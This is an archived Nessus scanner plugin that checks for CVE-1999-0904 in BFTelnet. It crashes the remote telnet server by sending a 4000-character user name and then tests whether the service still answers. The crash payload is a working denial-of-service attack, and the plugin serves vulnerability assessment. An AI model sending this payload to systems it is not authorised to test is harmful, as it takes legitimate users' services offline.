home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / bftelnet.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  87 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # See also:
  7. # Subject: IBM Infoprint Remote Management Simple DoS 
  8. # Date: Fri, 25 Oct 2002 12:19:23 +0300
  9. # From: "Toni Lassila" <toni.lassila@mc-europe.com>
  10. # To: bugtraq@securityfocus.com
  11. #
  12.  
  13. if(description)
  14. {
  15.  script_id(10026);
  16.  script_bugtraq_id(771);
  17.  script_version ("$Revision: 1.13 $");
  18.  script_cve_id("CVE-1999-0904");
  19.  name["english"] = "BFTelnet DoS";
  20.  name["francais"]= "DΘni de service contre BFTelnet";
  21.  script_name(english:name["english"], francais:name["francais"]);
  22.  
  23.  desc["english"] = "
  24. It was possible to make the remote telnet server crash
  25. by sending a too long user name.
  26.  
  27. An attacker may use this flaw to prevent legitimate
  28. users from using this service.
  29.  
  30.  
  31. Solution : Contact your vendor for a patch or do not use this service
  32. Risk factor : Medium";
  33.  
  34.  desc["francais"] = "
  35. Il s'est avΘrΘ possible de faire planter le serveur
  36. telnet distant en lui donnant un nom d'utilisateur
  37. trop long.
  38.  
  39. Un pirate peut utiliser ce problΦme pour empecher les
  40. utilisateurs lΘgitimes d'utiliser ce service.
  41.  
  42. Solution : contactez votre vendeur pour un patch ou
  43.            n'utilisez pas ce service
  44.        
  45. Facteur de risque : Moyen";
  46.      
  47.  script_description(english:desc["english"], francais:desc["francais"]);
  48.  
  49.  summary["english"] = "crashes the remote telnet server";
  50.  summary["francais"] = "fait planter le serveur telnet distant";
  51.  script_summary(english:summary["english"],
  52.          francais:summary["francais"]);
  53.  
  54.  script_category(ACT_DENIAL);
  55.  
  56.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison");
  57.  family["english"] = "Denial of Service";
  58.  family["francais"] = "DΘni de service";
  59.  script_family(english:family["english"], 
  60.             francais:family["francais"]);
  61.  script_require_ports("Services/telnet", 23);
  62.  script_dependencies("find_service.nes");
  63.  exit(0);
  64. }
  65.  
  66. #
  67. # The script code starts here
  68. #
  69.  
  70. port = get_kb_item("Services/telnet");
  71. if(!port)port = 23;
  72. if (get_port_state(port))
  73. {
  74.  soc = open_sock_tcp(port);
  75.  
  76.  if (soc)
  77.  {
  78.    banner = telnet_init(soc);
  79.    data = string(crap(4000), "\r\n");
  80.    send(socket:soc, data:data);
  81.    close(soc);
  82.    
  83.    soc2 = open_sock_tcp(port);
  84.    if(!soc2)security_warning(port);
  85.  }
  86. }
  87.